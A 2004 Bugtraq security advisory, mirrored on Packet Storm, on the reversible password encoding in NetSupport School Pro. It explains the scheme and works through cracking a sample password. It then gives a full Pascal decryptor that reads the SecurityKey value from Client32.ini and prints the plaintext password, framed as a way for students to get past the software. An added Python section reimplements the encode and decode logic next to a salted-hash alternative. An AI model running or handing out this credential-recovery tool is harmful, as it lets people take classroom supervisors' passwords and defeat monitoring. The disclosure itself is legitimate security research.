
netsupport.txt

27 Mar 2004 00:00:00 | Reported by spiffomatic 64 | Type: packetstorm | Source: packetstormsecurity.com

NetSupport School has a password protection weakness due to an insecure encryption method.

Code
`To the moderator, this is my first bugtraq posting, feel free to make any
changes you feel necessary to make this more helpful. Thank you very much
  
Vendor : NetSupport  
URL : http://www.netsupport-inc.com/  
Version : Invision NetSupport School Pro  
Risk : Password protection weakness  
  
Description: NetSupport School, market leading training tool for the modern   
classroom featuring full student remote control, application & internet   
monitoring, customized student testing and more.  
  
Password protection weakness: The password encryption method is easily
reversed. The encryption method is as follows:
The letters are expressed using a hexadecimal type of system. Every letter
is shown by two characters: the first character can be any ASCII character,
while the second is in a range from a-p. This works just like hex in that
ap+1=ba. It's not case sensitive, so that also makes it easier for kids to get
passes. The characters start at EM, so A=EM, B=EN and so on. Each letter is
also added to by the number of letters in front of it, so the crypt of
aa=EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the
crypt of each column though. Here is a reference for the letter a and its
crypt of each column: EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this
knowledge and the hex-esque characters, and the addition to each char based
on the amount of letters in front of it, you can get the password from an
encrypted one.

An example of a cracked password: The crypt is “GC;H@KEO”. GC - 3 = FP
(according to the hexish system); FP=T, so the first letter is T. Take 9O
(known “a” for the 2nd column) and add the difference from a-t to it (19)
and you get ;B. Add 2 to it (amount of letters in front of it) = ;D, then
subtract ;D from ;H and you get 4 places. A+4 = E, so the second letter is
“E”. You continue to do this until you get the password “test”.
  
Solution: based on my research this program uses a hash type validation   
method, so the quickest and most painless solution would be to use the md5   
routine for passwords.  
  
Credits: Credits go to Drexel University, and Harry Hoffman, because if they
hadn’t used this software I would never have had the urge to circumvent
it ;)
As well as Mr. Flynn for teaching me Pascal (even though it's 20+ years old,
it's still my favorite)
  
  
  
  
Spiffomatic64  
Hacking is an art-form  
  
  
Here is a program that will decrypt the password off of a machine with the
software running:
(old school :-D it's written in Pascal)
  
program exploit;
uses crt;

var
  i, j, length, x, y, crazy: integer;
  passfile: text;
  line: string;
  password, p: array [1..100] of char;
  known, convert: array [1..26, 1..3] of char;
  ch, tempx, tempy, key: char;

{ Build the first-column lookup table: EM = A, EN = B, and so on. }
procedure conv;
begin
  convert[1,1] := 'E';
  convert[1,2] := 'M';
  convert[1,3] := 'A';
  for i := 2 to 26 do begin
    if convert[i-1,2] = 'P' then begin
      { second character wraps from P to A and carries into the first }
      convert[i,1] := chr(ord(convert[i-1,1]) + 1);
      convert[i,2] := 'A';
    end
    else begin
      convert[i,1] := convert[i-1,1];
      convert[i,2] := chr(ord(convert[i-1,2]) + 1);
    end;
    convert[i,3] := chr(ord(convert[i-1,3]) + 1);
  end;
end;

{ Shift the pair (a,b) by num places in the A..P base-16 system.
  The result is returned in the globals tempx and tempy. }
procedure hex(a, b: char; num: integer);
begin
  if num > 0 then begin
    for i := 1 to num do begin
      if b = 'P' then begin
        b := 'A';
        a := chr(ord(a) + 1);
      end else inc(b);
    end;
  end;
  if num < 0 then begin
    for i := -1 downto num do begin
      if b = 'A' then begin
        b := 'P';
        a := chr(ord(a) - 1);
      end else dec(b);
    end;
  end;
  tempx := a;
  tempy := b;
end;

{ Look up the plaintext letter for a first-column pair (not used below). }
function compare(a, b: char): char;
begin
  for i := 1 to 26 do begin
    if (a = convert[i,1]) and (b = convert[i,2]) then compare := chr(i + 64);
  end;
end;

{ Number of places between pair (a,b) and pair (c,d). }
function diff(a, b, c, d: char): integer;
var
  num1, num2: integer;
begin
  num1 := ord(a) * 16 + ord(b);
  num2 := ord(c) * 16 + ord(d);
  diff := num2 - num1;
end;

begin
  { get the hash from client32.ini }
  clrscr;
  Writeln(' _________________________________________________________');
  Writeln('|NetSupport School Pro Password decryptor |');
  Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
  Writeln('|and my wonderful fiance Halley |');
  Writeln(' ---------------------------------------------------------');
  Writeln('');
  assign(passfile, 'C:\Progra~1\NetSup~1\Client32.ini');
  reset(passfile);
  i := 0;
  while not eof(passfile) do
  begin
    line := '';
    while not EoLn(passfile) do
    begin
      Read(passfile, ch);
      line := line + ch;
      { everything after "SecurityKey=" on this line is the stored value }
      if line = 'SecurityKey=' then begin
        while not eoln(passfile) do
        begin
          inc(i);
          read(passfile, ch);
          password[i] := ch;
        end;
        length := i;
      end;
    end;
    readln(passfile, line);
  end;
  write('Hash: ');
  for i := 1 to length do write(password[i]);
  writeln('');

  { decrypt the hash }
  conv;
  { known[n] is the crypt of the letter A in column n;
    only the first 15 columns are filled in }
  known[1,1] := 'E';
  known[1,2] := 'M';
  known[2,1] := '9';
  known[2,2] := 'O';
  known[3,1] := '>';
  known[3,2] := 'A';
  known[4,1] := 'B';
  known[4,2] := 'C';
  known[5,1] := 'F';
  known[5,2] := 'E';
  known[6,1] := ':';
  known[6,2] := 'G';
  known[7,1] := '>';
  known[7,2] := 'I';
  known[8,1] := 'B';
  known[8,2] := 'K';
  known[9,1] := 'F';
  known[9,2] := 'M';
  known[10,1] := ':';
  known[10,2] := 'O';
  known[11,1] := '?';
  known[11,2] := 'A';
  known[12,1] := 'C';
  known[12,2] := 'C';
  known[13,1] := 'G';
  known[13,2] := 'E';
  known[14,1] := ';';
  known[14,2] := 'G';
  known[15,1] := '?';
  known[15,2] := 'I';

  { get the first char }
  { letters not yet recovered start as 'A', which contributes 0 below }
  for i := 1 to round(length / 2) do p[i] := chr(65);
  for x := 1 to round(length / 2) do begin
    crazy := 0;
    { undo the "number of letters in front of it" addition }
    crazy := -(round(length / 2)) + x;
    { undo the running sum of the letters recovered so far }
    for y := 1 to round(length / 2) do crazy := crazy - (ord(p[y]) - 65);
    hex(password[x*2-1], password[x*2], crazy);
    p[x] := chr(diff(known[x,1], known[x,2], tempx, tempy) + 65);
  end;
  writeln('');
  write('Password: ');
  for i := 1 to round(length / 2) do begin
    write(p[i]);
  end;
  readkey;

end.
  
`
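The following is an added example, not code from the original posting or from NetSupport: a Python model of the encoding as the advisory describes it, shown beside a one-way salted store so the difference between a reversible encoding and a password hash is concrete. The function names, the PBKDF2 choice and its parameters are assumptions of this example; the column values are the ten listed in the advisory text.

```python
import hashlib
import hmac
import os

# Crypt of the letter "a" in each column, as listed in the advisory text.
BASES = ["EM", "9O", ">A", "BC", "FE", ":G", ">I", "BK", "FM", ":O"]

def _to_int(pair):
    # First char is the high digit (any ASCII), second is a base-16 digit A..P.
    return ord(pair[0]) * 16 + (ord(pair[1].upper()) - ord("A"))

def _to_pair(value):
    return chr(value // 16) + chr(ord("A") + value % 16)

def legacy_encode(password):
    """Model of the stored SecurityKey value (letters only, 10 columns)."""
    if not (password.isascii() and password.isalpha()) or len(password) > len(BASES):
        raise ValueError("model covers 1-10 ASCII letters only")
    letters = [ord(c) - ord("A") for c in password.upper()]
    out, running = [], 0
    for k, letter in enumerate(letters):
        following = len(letters) - 1 - k   # letters after this one
        out.append(_to_pair(_to_int(BASES[k]) + letter + following + running))
        running += letter                  # earlier letters shift later columns
    return "".join(out)

def legacy_decode(key):
    """Inverse of legacy_encode: only the stored value is needed, no secret."""
    pairs = [key[i:i + 2] for i in range(0, len(key), 2)]
    out, running = [], 0
    for k, pair in enumerate(pairs):
        following = len(pairs) - 1 - k
        letter = _to_int(pair) - _to_int(BASES[k]) - following - running
        out.append(chr(ord("A") + letter))
        running += letter
    return "".join(out)

def hash_password(password, salt=None, iterations=600_000):
    """One-way store: salted PBKDF2-HMAC-SHA256 (parameters are assumptions)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, iterations, digest

def verify_password(password, salt, iterations, digest):
    """Recompute and compare in constant time; the password is never recoverable."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)
```

The model reproduces the advisory's three sample values (aa, aaa and the worked "test" example); anything outside those, such as digits or longer passwords, is not covered by the page and is rejected.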
